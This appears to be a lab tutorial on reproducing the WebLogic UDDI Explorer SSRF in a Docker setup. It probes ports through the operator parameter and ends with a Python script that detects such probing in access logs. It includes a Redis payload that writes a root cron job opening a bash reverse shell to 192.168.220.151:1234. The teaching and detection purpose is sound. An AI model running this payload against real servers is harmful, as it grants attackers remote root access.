How to reproduce the WebLogic SSRF vulnerability

12-22-2023

First, build the environment with Docker. Docker installation and environment setup tutorial: https://www.freebuf.com/sectool/252257.html

Access port 7001

 

Second, the steps to reproduce the vulnerability

1. Vulnerable page: /uddiexplorer/SearchPublicRegistries.jsp

2. Inspect the IBM option

It turns out to be a link (a URL), so there may be an SSRF.

3. Capture packets with Burp Suite and click Search

4. Modify the URL in the operator parameter

5. Results: accessing a nonexistent port returns "could not connect over HTTP".

Accessing an existing port returns a status code.

Accessing the intranet

Payload for a reverse shell using Redis:

set 1 "* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1"
config set dir /etc/
config set dbfilename crontab
save
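On the defensive side, the tampering in steps 4 and 5 leaves a trace: requests to the vulnerable page whose operator value points at a loopback or private address. The Python sketch below is an added example, not part of the original post. It assumes the operator value is visible in the logged request line; the log lines, client addresses and function names are constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

VULN_PATH = "/uddiexplorer/SearchPublicRegistries.jsp"
REQ_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (not from the original page).
SAMPLE_LOG = [
    '203.0.113.9 - - [22/Dec/2023:10:00:01 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2Fregistry.example.com%2Finquiryapi HTTP/1.1" 200 9000',
    '203.0.113.9 - - [22/Dec/2023:10:00:05 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2F127.0.0.1%3A7001 HTTP/1.1" 200 9100',
    '203.0.113.9 - - [22/Dec/2023:10:00:06 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2F172.18.0.2%3A6379 HTTP/1.1" 200 9100',
    '203.0.113.9 - - [22/Dec/2023:10:00:07 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2F172.18.0.2%3A22 HTTP/1.1" 200 9100',
    '198.51.100.4 - - [22/Dec/2023:10:01:00 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3000',
]

def is_internal(host):
    """True for 'localhost' and for loopback, private or link-local IP literals."""
    if host.lower() == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname; resolving it is out of scope for this sketch
    return ip.is_loopback or ip.is_private or ip.is_link_local

def find_ssrf_attempts(lines):
    """Map each client IP to the sorted internal (host, port) targets it requested."""
    hits = defaultdict(set)
    for line in lines:
        m = REQ_RE.match(line)
        url = urlsplit(m.group(2)) if m else None
        if url is None or url.path != VULN_PATH:
            continue
        for op in parse_qs(url.query).get("operator", []):
            try:
                dest = urlsplit(op)
                host, port = dest.hostname, dest.port or 80  # default HTTP port assumed
            except ValueError:
                continue  # malformed URL or port in the operator value
            if host and is_internal(host):
                hits[m.group(1)].add((host, port))
    return {client: sorted(targets) for client, targets in hits.items()}

if __name__ == "__main__":
    for client, targets in find_ssrf_attempts(SAMPLE_LOG).items():
        print(client, "->", targets)
```

A single client requesting several internal host and port pairs through this page in a short time matches the port-probing behaviour described in step 5.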
